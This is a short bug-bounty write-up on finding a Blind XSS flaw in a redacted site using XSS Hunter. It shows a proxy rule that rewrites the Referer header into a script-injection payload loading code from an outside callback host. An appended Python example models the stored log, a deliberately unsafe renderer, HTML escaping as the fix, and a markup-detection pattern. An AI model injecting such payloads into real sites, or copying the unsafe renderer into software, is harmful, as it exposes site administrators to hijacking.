How I found Blind XSS Vulnerability in redacted.com

Today I want to share with you a Blind XSS that I found in a private site. In this write-up I will explain how I found the Blind XSS and the methodology I used.

Blind XSS is a flavor of cross-site scripting (XSS) in which the attacker "blindly" publishes a series of payloads into web page inputs that are likely to be persisted (for example in a database or in a log) and rendered later in a page the attacker never sees, such as an administrative log viewer.

Currently I use XSS Hunter (the web version) to find Blind XSS.

XSShunter:

XSS Hunter is a recently launched platform that makes pen testing for XSS vulnerabilities much easier to monitor and organize. Through it you can launch all kinds of XSS attacks, but where it really shines is when carrying out a Blind XSS attack.

Step 1: To create a new rule, as none of the pre-defined ones does what we need, click “Add”, and you’ll see the new rule dialogue appear. Click the “Type” drop-down and click “Request header”.

Then, add ^Referer.*$ as the “Match” criteria. This string is a regular expression that matches on any header string that starts with Referer. As there should be only one, if any, then a simple match is all we need.

Next, set the "Replace" text to Referer: "><script src=https://newone.xss.ht></script>. Then check the "Regex match" checkbox and click "OK".

Step 2: When the request is intercepted, you will see in the "Raw" view that the Referer header has been replaced with Referer: "><script src=https://newone.xss.ht></script>, as in the image below.

Step 3: After a few hours, when I went back to XSS Hunter, it showed that the blind XSS had been executed.
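To make the sink behind this finding concrete, here is an added example (not code from the write-up or from XSS Hunter) that models the two halves of the story above: a request whose Referer header carries the probe string from Step 1 is persisted into an access log, and that log is later rendered as HTML. The constructed request, the `redacted.com` host name and the log-viewer functions are assumptions for illustration; `newone.xss.ht` is the host used on this page. The unsafe renderer reproduces the vulnerable pattern, the safe renderer shows the output encoding that neutralises it, and `suspicious_entries` is the kind of check a defender can run over stored headers to notice probes like this before an administrator opens the page.

```python
import html
import re

# Constructed sample requests. The first carries the Referer probe shown in
# Step 1 of the write-up; the second is an ordinary visit for comparison.
RAW_REQUEST = (
    "GET /contact HTTP/1.1\r\n"
    "Host: redacted.com\r\n"  # assumed host, standing in for the real target
    'Referer: "><script src=https://newone.xss.ht></script>\r\n'
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "GET /about HTTP/1.1\r\n"
    "Host: redacted.com\r\n"
    "Referer: https://www.example.org/links\r\n"
    "\r\n"
)

HEADER_RE = re.compile(r"^(?P<name>[^:\s]+):\s*(?P<value>.*)$")


def parse_headers(raw: str) -> dict:
    """Split a raw HTTP request into a {lower-case name: value} dict."""
    headers = {}
    for line in raw.split("\r\n")[1:]:  # skip the request line
        if not line:
            break  # blank line terminates the header block
        m = HEADER_RE.match(line)
        if m:
            headers[m.group("name").lower()] = m.group("value")
    return headers


def store_visit(log: list, raw: str) -> None:
    """Simulate the application persisting path and Referer into its log."""
    headers = parse_headers(raw)
    path = raw.split(" ", 2)[1]
    log.append({"path": path, "referer": headers.get("referer", "")})


def render_log_unsafe(log: list) -> str:
    """Vulnerable sink: stored values are concatenated straight into HTML,
    so a Referer like the one above executes when an admin views the log."""
    rows = "".join(
        f"<tr><td>{e['path']}</td><td>{e['referer']}</td></tr>" for e in log
    )
    return f"<table>{rows}</table>"


def render_log_safe(log: list) -> str:
    """Hardened sink: every stored value is HTML-escaped at output time,
    which is the fix regardless of how the value got into the log."""
    rows = "".join(
        f"<tr><td>{html.escape(e['path'])}</td>"
        f"<td>{html.escape(e['referer'])}</td></tr>"
        for e in log
    )
    return f"<table>{rows}</table>"


# Markup characters and common script-bearing tokens that have no business
# in a legitimate Referer value.
MARKUP_RE = re.compile(r"[<>\"']|javascript:|on\w+\s*=", re.IGNORECASE)


def suspicious_entries(log: list) -> list:
    """Detection pass over stored headers: return entries containing markup."""
    return [e for e in log if MARKUP_RE.search(e["referer"])]


if __name__ == "__main__":
    log = []
    store_visit(log, RAW_REQUEST)
    store_visit(log, BENIGN_REQUEST)
    print("unsafe:", render_log_unsafe(log))
    print("safe:  ", render_log_safe(log))
    print("flagged:", [e["referer"] for e in suspicious_entries(log)])
```

Running the block prints the same log rendered both ways: the unsafe table contains a live `<script src=https://newone.xss.ht>` element, while the safe table shows the probe as inert text, and the detection pass flags exactly the one entry that carries markup.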